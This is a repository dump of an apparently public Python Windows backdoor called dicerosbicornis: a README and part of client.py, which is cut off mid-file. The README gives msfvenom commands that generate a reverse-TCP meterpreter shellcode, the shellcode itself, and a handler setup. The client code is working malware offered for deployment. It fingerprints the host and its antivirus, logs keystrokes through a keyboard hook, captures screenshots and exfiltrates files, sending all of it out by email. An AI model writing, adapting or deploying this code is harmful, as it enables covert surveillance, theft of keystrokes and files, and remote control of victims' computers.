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├── dicerosbicornis.py
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1 | DicerosBicornis
2 | ====
3 |
4 | A stealthy Python based Windows backdoor that uses email as a command and control server.
5 |
6 | Requirements
7 | =====
8 |
9 | * Python 2.x
10 | * PyCrypto module
11 | * WMI module
12 | * Enum34 module
13 | * Netifaces module
14 | * pypiwin32 module
15 |
16 | Features
17 | =====
18 |
19 | * Encrypted transportation messages (AES) + SHA256 hashing
20 | * Generate computer unique id using system information/characteristics (SHA256 hash)
21 | * Job IDs are random SHA256 hashes
22 | * Retrieve system information
23 | * Retrieve Geolocation information (City, Country, lat, long, etc..)
24 | * Retrieve running processes/system services/system users/devices (hardware)
25 | * Retrieve list of clients
26 | * Execute system command
27 | * Download files from client
28 | * Upload files to client
29 | * Execute shellcode
30 | * Take screenshot
31 | * Lock client's screen
32 | * Keylogger
33 | * Lock remote computer's screen
34 | * Shutdown/Restart remote computer
35 | * Log off current user
36 | * Download file from the WEB
37 | * Visit website
38 | * Show message box to user
39 | * Ability to change check-in time
40 | * Ability to add jitter to check-in time to reduce predictability
41 |
42 | Setup
43 | =====
44 |
45 | For this to work you need:
46 | - A mail account
47 |
48 | Download/Installation
49 | ====
50 |
51 | * https://sourceforge.net/projects/pywin32
52 | * git clone https://github.com/maldevel/dicerosbicornis
53 | * pip install -r requirements.txt
54 |
55 | Contents
56 | =====
57 |
58 | - ```dicerosbicornis.py``` a script that's used to enumerate and issue commands to available clients
59 | - ```client.py``` the actual backdoor to deploy
60 |
61 | You're probably going to want to compile ```client.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller)
62 |
63 | **Note: It's recommended you compile client.py using a 32bit Python installation**
64 |
65 | Usage
66 | =====
67 | ```
68 | usage: dicerosbicornis.py [-h] [-v] [-id ID] [-jobid JOBID] [-list | -info]
69 | [-cmd CMD | -visitwebsite URL | -message TEXT TITLE | -tasks | -services | -users | -devices | -download PATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE | -screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin | -start-keylogger | -stop-keylogger | -email-checkin CHECK | -jitter jit]
70 |
71 | optional arguments:
72 | -h, --help show this help message and exit
73 | -v, --version show program's version number and exit
74 | -id ID Client to target
75 | -jobid JOBID Job id to retrieve
76 |
77 | -list List available clients
78 | -info Retrieve info on specified client
79 |
80 | Commands:
81 | Commands to execute on a client
82 |
83 | -cmd CMD Execute a system command
84 | -visitwebsite URL Visit website
85 | -message TEXT TITLE Show message to user
86 | -tasks Retrieve running processes
87 | -services Retrieve system services
88 | -users Retrieve system users
89 | -devices Retrieve devices(Hardware)
90 | -download PATH Download a file from a clients system
91 | -download-fromurl URL
92 | Download a file from the web
93 | -upload SRC DST Upload a file to the clients system
94 | -exec-shellcode FILE Execute supplied shellcode on a client
95 | -screenshot Take a screenshot
96 | -lock-screen Lock the clients screen
97 | -shutdown Shutdown remote computer
98 | -restart Restart remote computer
99 | -logoff Log off current remote user
100 | -force-checkin Force a check in
101 | -start-keylogger Start keylogger
102 | -stop-keylogger Stop keylogger
103 | -email-checkin CHECK Seconds to wait before checking for new commands
104 | -jitter jit Percentage of Jitter
105 | ```
106 |
107 | Shellcode Exec
108 | =====
109 |
110 | ```
111 | $ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python
112 |
113 | No encoder or badchars specified, outputting raw payload
114 | Payload size: 354 bytes
115 | buf = ""
116 | buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
117 | buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0\xb7"
118 | buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
119 | buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
120 | buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
121 | buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
122 | buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
123 | buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
124 | buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
125 | buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
126 | buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
127 | buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
128 | buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
129 | buf += "\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11"
130 | buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
131 | buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
132 | buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
133 | buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
134 | buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
135 | buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
136 | buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
137 | buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
138 | buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
139 | buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
140 | buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
141 | buf += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
142 | buf += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
143 | buf += "\x53\xff\xd5"
144 | ```
145 |
146 | Get rid of everything except for the shellcode and stick it in a file:
147 |
148 | ```
149 | $ cat shell.txt
150 | \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
151 | ```
152 | run the console
153 |
154 | ```
155 | ./msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run"
156 | ```
157 |
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/client.py:
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1 | """
2 | This file is part of dicerosbicornis
3 | Copyright (C) 2017 @maldevel
4 | https://github.com/maldevel/dicerosbicornis
5 |
6 | dicerosbicornis - A fully featured backdoor that uses email as a C&C server.
7 |
8 | This program is free software: you can redistribute it and/or modify
9 | it under the terms of the GNU General Public License as published by
10 | the Free Software Foundation, either version 3 of the License, or
11 | (at your option) any later version.
12 |
13 | This program is distributed in the hope that it will be useful,
14 | but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | GNU General Public License for more details.
17 |
18 | You should have received a copy of the GNU General Public License
19 | along with this program. If not, see .
20 |
21 | For more see the file 'LICENSE' for copying permission.
22 | """
23 |
24 | __author__ = "maldevel"
25 | __copyright__ = "Copyright (c) 2017 @maldevel"
26 | __credits__ = ["maldevel"]
27 | __license__ = "GPLv3"
28 | __version__ = "1.0"
29 | __maintainer__ = "maldevel"
30 |
31 |
32 | #####################
33 |
34 | import subprocess
35 | import os
36 | import base64
37 | import threading
38 | import time
39 | import random
40 | import string
41 | import imaplib
42 | import email
43 | import platform
44 | import hashlib
45 | import ctypes
46 | import json
47 | import wmi
48 | import getpass
49 | import uuid
50 | import netifaces
51 | import urllib2
52 | import urllib
53 | import pythoncom
54 | import random
55 |
56 | from win32com.client import GetObject
57 | from enum import Enum
58 | from base64 import b64decode
59 | from smtplib import SMTP
60 | from email.MIMEMultipart import MIMEMultipart
61 | from email.MIMEBase import MIMEBase
62 | from email.MIMEText import MIMEText
63 | from email import Encoders
64 | from struct import pack
65 | from zlib import compress, crc32
66 | from ctypes import c_void_p, c_int, create_string_buffer, sizeof, windll, Structure, WINFUNCTYPE, CFUNCTYPE, POINTER
67 | from ctypes.wintypes import BOOL, DOUBLE, DWORD, HBITMAP, HDC, HGDIOBJ, HWND, INT, LPARAM, LONG, RECT, UINT, WORD, MSG
68 | from Crypto.Cipher import AES
69 | from Crypto import Random
70 |
71 | ######################################################
72 |
73 | mail_user = 'myuser@example.com'
74 | mail_pwd = 'mypassword'
75 | server = "mail.example.com"
76 | server_port = 587
77 | AESKey = 'my_AES_key'
78 | EMAIL_KNOCK_TIMEOUT = 60 # seconds - check for new commands/jobs every EMAIL_KNOCK_TIMEOUT seconds
79 | JITTER = 100
80 | TAG = 'RELEASE'
81 | VERSION = '1.0.0'
82 |
83 | #######################################
84 |
85 | class InfoSecurity:
86 |
87 | def __init__(self):
88 | self.bs = 32
89 | self.key = hashlib.sha256(AESKey.encode()).digest()
90 |
91 | def Encrypt(self, plainText):
92 | raw = self._pad(plainText)
93 | iv = Random.new().read(AES.block_size)
94 | cipher = AES.new(self.key, AES.MODE_CBC, iv)
95 | return base64.b64encode(iv + cipher.encrypt(raw))
96 |
97 | def Decrypt(self, cipherText):
98 | enc = base64.b64decode(cipherText)
99 | iv = enc[:AES.block_size]
100 | cipher = AES.new(self.key, AES.MODE_CBC, iv)
101 | return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
102 |
103 | def _pad(self, s):
104 | return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
105 |
106 | def _unpad(self, s):
107 | return s[:-ord(s[len(s)-1:])]
108 |
109 | infoSec = InfoSecurity()
110 |
111 |
112 | class AccountType(Enum):
113 | DUPLICATE_ACCOUNT = 256
114 | NORMAL_ACCOUNT = 512
115 | INTERDOMAIN_TRUST_ACCOUNT = 2048
116 | WORKSTATION_TRUST_ACCOUNT = 4096
117 | SERVER_TRUST_ACCOUNT = 8192
118 |
119 | class ChassisTypes(Enum):
120 | Other = 1
121 | Unknown = 2
122 | Desktop = 3
123 | LowProfileDesktop = 4
124 | PizzaBox = 5
125 | MiniTower = 6
126 | Tower = 7
127 | Portable = 8
128 | Laptop = 9
129 | Notebook = 10
130 | Handheld = 11
131 | DockingStation = 12
132 | AllInOne = 13
133 | SubNotebook = 14
134 | SpaceSaving = 15
135 | LunchBox = 16
136 | MainSystemChassis = 17
137 | ExpansionChassis = 18
138 | SubChassis = 19
139 | BusExpansionChassis = 20
140 | PeripheralChassis = 21
141 | StorageChassis = 22
142 | RackMountChassis = 23
143 | SealedCasePC = 24
144 |
145 | def getGeolocation():
146 | try:
147 | req = urllib2.Request('http://ip-api.com/json/', data=None, headers={
148 | 'User-Agent':'dicerosbicornis'
149 | })
150 | response = urllib2.urlopen(req)
151 | if response.code == 200:
152 | encoding = response.headers.getparam('charset')
153 | return json.loads(response.read().decode(encoding))
154 | return False
155 | except Exception:
156 | return False
157 |
158 |
159 | class SystemInfo:
160 | def __init__(self):
161 | self.Architecture = platform.machine()
162 | self.WinVer = platform.platform()
163 | self.CPU = platform.processor()
164 | self.User = getpass.getuser()
165 | self.PCName = platform.node()
166 | self.isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
167 | if self.isAdmin == 0:
168 | self.isAdmin = 'no'
169 | else:
170 | self.isAdmin = 'yes'
171 | w = wmi.WMI()
172 | self.GPU = []
173 | for i in w.Win32_VideoController():
174 | self.GPU.append(i.Caption.strip())
175 | self.Motherboard = ''
176 | for i in w.Win32_BaseBoard():
177 | self.Motherboard = '{0} {1} {2}'.format(i.Manufacturer, i.Product, i.SerialNumber).strip()
178 | break
179 | self.ChassisType = ''
180 | for i in w.Win32_SystemEnclosure():
181 | for j in i.ChassisTypes:
182 | self.ChassisType = str(ChassisTypes(j)).split('.')[1]
183 | break
184 | break
185 | self.TotalRam = 0.0
186 | for i in w.Win32_ComputerSystem():
187 | self.TotalRam = (round(float(i.TotalPhysicalMemory) / 1024 / 1024 / 1024))
188 | break
189 | self.Bios = ''
190 | for i in w.Win32_BIOS():
191 | self.Bios = '{0} {1} {2}'.format(i.Caption, i.Manufacturer, i.SerialNumber).strip()
192 | break
193 | self.PID = os.getpid()
194 | self.MAC = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
195 | self.IPv4 = ''
196 | for iface in netifaces.interfaces():
197 | if netifaces.ifaddresses(iface)[netifaces.AF_LINK][0]['addr'] == self.MAC:
198 | self.IPv4 = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])[0]['addr']
199 | self.Antivirus = []
200 | objWMI = GetObject('winmgmts:\\\\.\\root\\SecurityCenter2').InstancesOf('AntiVirusProduct')
201 | for i in objWMI:
202 | self.Antivirus.append(i.displayName.strip())
203 | self.Firewall = []
204 | objWMI = GetObject('winmgmts:\\\\.\\root\\SecurityCenter2').InstancesOf('FirewallProduct')
205 | for i in objWMI:
206 | self.Firewall.append(i.displayName.strip())
207 | self.Antispyware = []
208 | objWMI = GetObject('winmgmts:\\\\.\\root\\SecurityCenter2').InstancesOf('AntiSpywareProduct')
209 | for i in objWMI:
210 | self.Antispyware.append(i.displayName.strip())
211 | self.Geolocation = getGeolocation()
212 |
213 |
214 | self.UniqueID = hashlib.sha256(
215 | self.Architecture +
216 | self.WinVer +
217 | self.CPU +
218 | ';'.join(self.GPU) +
219 | self.isAdmin +
220 | self.Motherboard +
221 | self.ChassisType +
222 | '{0}@{1}'.format(self.User, self.PCName) +
223 | str(self.TotalRam) +
224 | self.Bios +
225 | self.MAC
226 | ).hexdigest()
227 |
228 |
229 | sysInfo = SystemInfo()
230 |
231 |
232 | WH_KEYBOARD_LL=13
233 | WM_KEYDOWN=0x0100
234 | CTRL_CODE = 162
235 |
236 |
237 | ### Following code was stolen from python-mss https://github.com/BoboTiG/python-mss ###
238 | class BITMAPINFOHEADER(Structure):
239 | _fields_ = [('biSize', DWORD), ('biWidth', LONG), ('biHeight', LONG),
240 | ('biPlanes', WORD), ('biBitCount', WORD),
241 | ('biCompression', DWORD), ('biSizeImage', DWORD),
242 | ('biXPelsPerMeter', LONG), ('biYPelsPerMeter', LONG),
243 | ('biClrUsed', DWORD), ('biClrImportant', DWORD)]
244 |
245 | class BITMAPINFO(Structure):
246 | _fields_ = [('bmiHeader', BITMAPINFOHEADER), ('bmiColors', DWORD * 3)]
247 |
248 | class screenshot(threading.Thread):
249 | ''' Mutliple ScreenShots implementation for Microsoft Windows. '''
250 |
251 | def __init__(self, jobid):
252 | ''' Windows initialisations. '''
253 | threading.Thread.__init__(self)
254 | self.jobid = jobid
255 | self.daemon = True
256 | self._set_argtypes()
257 | self._set_restypes()
258 | self.start()
259 |
260 | def _set_argtypes(self):
261 | ''' Functions arguments. '''
262 |
263 | self.MONITORENUMPROC = WINFUNCTYPE(INT, DWORD, DWORD, POINTER(RECT),
264 | DOUBLE)
265 | windll.user32.GetSystemMetrics.argtypes = [INT]
266 | windll.user32.EnumDisplayMonitors.argtypes = [HDC, c_void_p,
267 | self.MONITORENUMPROC,
268 | LPARAM]
269 | windll.user32.GetWindowDC.argtypes = [HWND]
270 | windll.gdi32.CreateCompatibleDC.argtypes = [HDC]
271 | windll.gdi32.CreateCompatibleBitmap.argtypes = [HDC, INT, INT]
272 | windll.gdi32.SelectObject.argtypes = [HDC, HGDIOBJ]
273 | windll.gdi32.BitBlt.argtypes = [HDC, INT, INT, INT, INT, HDC, INT, INT,
274 | DWORD]
275 | windll.gdi32.DeleteObject.argtypes = [HGDIOBJ]
276 | windll.gdi32.GetDIBits.argtypes = [HDC, HBITMAP, UINT, UINT, c_void_p,
277 | POINTER(BITMAPINFO), UINT]
278 |
279 | def _set_restypes(self):
280 | ''' Functions return type. '''
281 |
282 | windll.user32.GetSystemMetrics.restypes = INT
283 | windll.user32.EnumDisplayMonitors.restypes = BOOL
284 | windll.user32.GetWindowDC.restypes = HDC
285 | windll.gdi32.CreateCompatibleDC.restypes = HDC
286 | windll.gdi32.CreateCompatibleBitmap.restypes = HBITMAP
287 | windll.gdi32.SelectObject.restypes = HGDIOBJ
288 | windll.gdi32.BitBlt.restypes = BOOL
289 | windll.gdi32.GetDIBits.restypes = INT
290 | windll.gdi32.DeleteObject.restypes = BOOL
291 |
292 | def enum_display_monitors(self, screen=-1):
293 | ''' Get positions of one or more monitors.
294 | Returns a dict with minimal requirements.
295 | '''
296 |
297 | if screen == -1:
298 | SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN = 76, 77
299 | SM_CXVIRTUALSCREEN, SM_CYVIRTUALSCREEN = 78, 79
300 | left = windll.user32.GetSystemMetrics(SM_XVIRTUALSCREEN)
301 | right = windll.user32.GetSystemMetrics(SM_CXVIRTUALSCREEN)
302 | top = windll.user32.GetSystemMetrics(SM_YVIRTUALSCREEN)
303 | bottom = windll.user32.GetSystemMetrics(SM_CYVIRTUALSCREEN)
304 | yield ({
305 | b'left': int(left),
306 | b'top': int(top),
307 | b'width': int(right - left),
308 | b'height': int(bottom - top)
309 | })
310 | else:
311 |
312 | def _callback(monitor, dc, rect, data):
313 | ''' Callback for MONITORENUMPROC() function, it will return
314 | a RECT with appropriate values.
315 | '''
316 | rct = rect.contents
317 | monitors.append({
318 | b'left': int(rct.left),
319 | b'top': int(rct.top),
320 | b'width': int(rct.right - rct.left),
321 | b'height': int(rct.bottom - rct.top)
322 | })
323 | return 1
324 |
325 | monitors = []
326 | callback = self.MONITORENUMPROC(_callback)
327 | windll.user32.EnumDisplayMonitors(0, 0, callback, 0)
328 | for mon in monitors:
329 | yield mon
330 |
331 | def get_pixels(self, monitor):
332 | ''' Retrieve all pixels from a monitor. Pixels have to be RGB.
333 | [1] A bottom-up DIB is specified by setting the height to a
334 | positive number, while a top-down DIB is specified by
335 | setting the height to a negative number.
336 | https://msdn.microsoft.com/en-us/library/ms787796.aspx
337 | https://msdn.microsoft.com/en-us/library/dd144879%28v=vs.85%29.aspx
338 | '''
339 |
340 | width, height = monitor[b'width'], monitor[b'height']
341 | left, top = monitor[b'left'], monitor[b'top']
342 | SRCCOPY = 0xCC0020
343 | DIB_RGB_COLORS = BI_RGB = 0
344 | srcdc = memdc = bmp = None
345 |
346 | try:
347 | bmi = BITMAPINFO()
348 | bmi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER)
349 | bmi.bmiHeader.biWidth = width
350 | bmi.bmiHeader.biHeight = -height # Why minus? See [1]
351 | bmi.bmiHeader.biPlanes = 1 # Always 1
352 | bmi.bmiHeader.biBitCount = 24
353 | bmi.bmiHeader.biCompression = BI_RGB
354 | buffer_len = height * width * 3
355 | self.image = create_string_buffer(buffer_len)
356 | srcdc = windll.user32.GetWindowDC(0)
357 | memdc = windll.gdi32.CreateCompatibleDC(srcdc)
358 | bmp = windll.gdi32.CreateCompatibleBitmap(srcdc, width, height)
359 | windll.gdi32.SelectObject(memdc, bmp)
360 | windll.gdi32.BitBlt(memdc, 0, 0, width, height, srcdc, left, top,
361 | SRCCOPY)
362 | bits = windll.gdi32.GetDIBits(memdc, bmp, 0, height, self.image,
363 | bmi, DIB_RGB_COLORS)
364 | if bits != height:
365 | raise Exception('MSS: GetDIBits() failed.')
366 | finally:
367 | # Clean up
368 | if srcdc:
369 | windll.gdi32.DeleteObject(srcdc)
370 | if memdc:
371 | windll.gdi32.DeleteObject(memdc)
372 | if bmp:
373 | windll.gdi32.DeleteObject(bmp)
374 |
375 | # Replace pixels values: BGR to RGB
376 | self.image[2:buffer_len:3], self.image[0:buffer_len:3] = \
377 | self.image[0:buffer_len:3], self.image[2:buffer_len:3]
378 | return self.image
379 |
380 | def save(self,
381 | output='screenshot-%d.png',
382 | screen=-1,
383 | callback=lambda *x: True):
384 | ''' Grab a screenshot and save it to a file.
385 | Parameters:
386 | - output - string - the output filename. It can contain '%d' which
387 | will be replaced by the monitor number.
388 | - screen - int - grab one screenshot of all monitors (screen=-1)
389 | grab one screenshot by monitor (screen=0)
390 | grab the screenshot of the monitor N (screen=N)
391 | - callback - function - in case where output already exists, call
392 | the defined callback function with output
393 | as parameter. If it returns True, then
394 | continue; else ignores the monitor and
395 | switches to ne next.
396 | This is a generator which returns created files.
397 | '''
398 |
399 | # Monitors screen shots!
400 | for i, monitor in enumerate(self.enum_display_monitors(screen)):
401 | if screen <= 0 or (screen > 0 and i + 1 == screen):
402 | fname = output
403 | if '%d' in output:
404 | fname = output.replace('%d', str(i + 1))
405 | callback(fname)
406 | self.save_img(data=self.get_pixels(monitor),
407 | width=monitor[b'width'],
408 | height=monitor[b'height'],
409 | output=fname)
410 | yield fname
411 |
412 | def save_img(self, data, width, height, output):
413 | ''' Dump data to the image file.
414 | Pure python PNG implementation.
415 | Image represented as RGB tuples, no interlacing.
416 | http://inaps.org/journal/comment-fonctionne-le-png
417 | '''
418 |
419 | zcrc32 = crc32
420 | zcompr = compress
421 | len_sl = width * 3
422 | scanlines = b''.join(
423 | [b'0' + data[y * len_sl:y * len_sl + len_sl]
424 | for y in range(height)])
425 |
426 | magic = pack(b'>8B', 137, 80, 78, 71, 13, 10, 26, 10)
427 |
428 | # Header: size, marker, data, CRC32
429 | ihdr = [b'', b'IHDR', b'', b'']
430 | ihdr[2] = pack(b'>2I5B', width, height, 8, 2, 0, 0, 0)
431 | ihdr[3] = pack(b'>I', zcrc32(b''.join(ihdr[1:3])) & 0xffffffff)
432 | ihdr[0] = pack(b'>I', len(ihdr[2]))
433 |
434 | # Data: size, marker, data, CRC32
435 | idat = [b'', b'IDAT', b'', b'']
436 | idat[2] = zcompr(scanlines, 9)
437 | idat[3] = pack(b'>I', zcrc32(b''.join(idat[1:3])) & 0xffffffff)
438 | idat[0] = pack(b'>I', len(idat[2]))
439 |
440 | # Footer: size, marker, None, CRC32
441 | iend = [b'', b'IEND', b'', b'']
442 | iend[3] = pack(b'>I', zcrc32(iend[1]) & 0xffffffff)
443 | iend[0] = pack(b'>I', len(iend[2]))
444 |
445 | with open(os.path.join(os.getenv('TEMP') + output), 'wb') as fileh:
446 | fileh.write(
447 | magic + b''.join(ihdr) + b''.join(idat) + b''.join(iend))
448 | return
449 | err = 'MSS: error writing data to "{0}".'.format(output)
450 | raise Exception(err)
451 |
452 | def run(self):
453 | img_name = genRandomString() + '.png'
454 | for filename in self.save(output=img_name, screen=-1):
455 | sendEmail({'cmd': 'screenshot', 'res': 'Screenshot taken'}, jobid=self.jobid, attachment=[os.path.join(os.getenv('TEMP') + img_name)])
456 |
457 | ### End of python-mss code ###
458 |
459 |
460 | class MessageParser:
461 |
462 | def __init__(self, msg_data):
463 | self.attachment = None
464 | self.getPayloads(msg_data)
465 | self.getSubjectHeader(msg_data)
466 | self.getDateHeader(msg_data)
467 |
468 | def getPayloads(self, msg_data):
469 | for payload in email.message_from_string(msg_data[1][0][1]).get_payload():
470 | if payload.get_content_maintype() == 'text':
471 | self.text = payload.get_payload()
472 | self.dict = json.loads(infoSec.Decrypt(payload.get_payload()))
473 |
474 | elif payload.get_content_maintype() == 'application':
475 | self.attachment = payload.get_payload()
476 |
477 | def getSubjectHeader(self, msg_data):
478 | self.subject = email.message_from_string(msg_data[1][0][1])['Subject']
479 |
480 | def getDateHeader(self, msg_data):
481 | self.date = email.message_from_string(msg_data[1][0][1])['Date']
482 |
483 |
484 | class keylogger(threading.Thread):
485 | #Stolen from http://earnestwish.com/2015/06/09/python-keyboard-hooking/
486 | exit = False
487 |
488 | def __init__(self, jobid):
489 | threading.Thread.__init__(self)
490 | self.jobid = jobid
491 | self.daemon = True
492 | self.hooked = None
493 | self.keys = ''
494 | self.start()
495 |
496 | def installHookProc(self, pointer):
497 | self.hooked = ctypes.windll.user32.SetWindowsHookExA(
498 | WH_KEYBOARD_LL,
499 | pointer,
500 | windll.kernel32.GetModuleHandleW(None),
501 | 0
502 | )
503 |
504 | if not self.hooked:
505 | return False
506 | return True
507 |
508 | def uninstallHookProc(self):
509 | if self.hooked is None:
510 | return
511 | ctypes.windll.user32.UnhookWindowsHookEx(self.hooked)
512 | self.hooked = None
513 |
514 | def getFPTR(self, fn):
515 | CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
516 | return CMPFUNC(fn)
517 |
518 | def hookProc(self, nCode, wParam, lParam):
519 | if wParam is not WM_KEYDOWN:
520 | return ctypes.windll.user32.CallNextHookEx(self.hooked, nCode, wParam, lParam)
521 |
522 | self.keys += chr(lParam[0])
523 |
524 | if len(self.keys) > 100:
525 | sendEmail({'cmd': 'keylogger', 'res': r'{}'.format(self.keys)}, self.jobid)
526 | self.keys = ''
527 |
528 | if (CTRL_CODE == int(lParam[0])) or (self.exit == True):
529 | sendEmail({'cmd': 'keylogger', 'res': 'Keylogger stopped'}, self.jobid)
530 | self.uninstallHookProc()
531 |
532 | return ctypes.windll.user32.CallNextHookEx(self.hooked, nCode, wParam, lParam)
533 |
534 | def startKeyLog(self):
535 | msg = MSG()
536 | ctypes.windll.user32.GetMessageA(ctypes.byref(msg),0,0,0)
537 |
538 | def run(self):
539 | pointer = self.getFPTR(self.hookProc)
540 |
541 | if self.installHookProc(pointer):
542 | sendEmail({'cmd': 'keylogger', 'res': 'Keylogger started'}, self.jobid)
543 | self.startKeyLog()
544 |
545 |
546 | class download(threading.Thread):
547 |
548 | def __init__(self, jobid, filepath):
549 | threading.Thread.__init__(self)
550 | self.jobid = jobid
551 | self.filepath = filepath
552 |
553 | self.daemon = True
554 | self.start()
555 |
556 | def run(self):
557 | try:
558 | if os.path.exists(self.filepath) is True:
559 | sendEmail({'cmd': 'download', 'res': 'Success'}, self.jobid, [self.filepath])
560 | else:
561 | sendEmail({'cmd': 'download', 'res': 'Path to file invalid'}, self.jobid)
562 | except Exception as e:
563 | sendEmail({'cmd': 'download', 'res': 'Failed: {}'.format(e)}, self.jobid)
564 |
565 |
566 | class downloadfromurl(threading.Thread):
567 |
568 | def __init__(self, jobid, url):
569 | threading.Thread.__init__(self)
570 | self.jobid = jobid
571 | self.url = url
572 | self.daemon = True
573 | self.start()
574 |
575 | def run(self):
576 | try:
577 | urllib.urlretrieve(self.url, os.path.join(os.getenv('TEMP') + '\\' + self.url.split('/')[-1]))
578 | sendEmail({'cmd': 'downloadfromurl', 'res': 'Success'}, self.jobid, [self.url])
579 | except Exception as e:
580 | sendEmail({'cmd': 'downloadfromurl', 'res': 'Failed: {}'.format(e)}, self.jobid)
581 |
582 |
583 | class tasks(threading.Thread):
584 |
585 | def __init__(self, jobid):
586 | threading.Thread.__init__(self)
587 | self.jobid = jobid
588 | self.daemon = True
589 | self.start()
590 |
591 | def _detectRunningProcesses(self):
592 | pythoncom.CoInitialize()
593 | procs = []
594 | w = wmi.WMI ()
595 | for process in w.Win32_Process ():
596 | procs.append('{0};{1}'.format(process.ProcessId, process.Name))
597 | return procs
598 |
599 | def run(self):
600 | try:
601 | sendEmail({'cmd': 'tasks', 'res': self._detectRunningProcesses()}, self.jobid)
602 | except Exception as e:
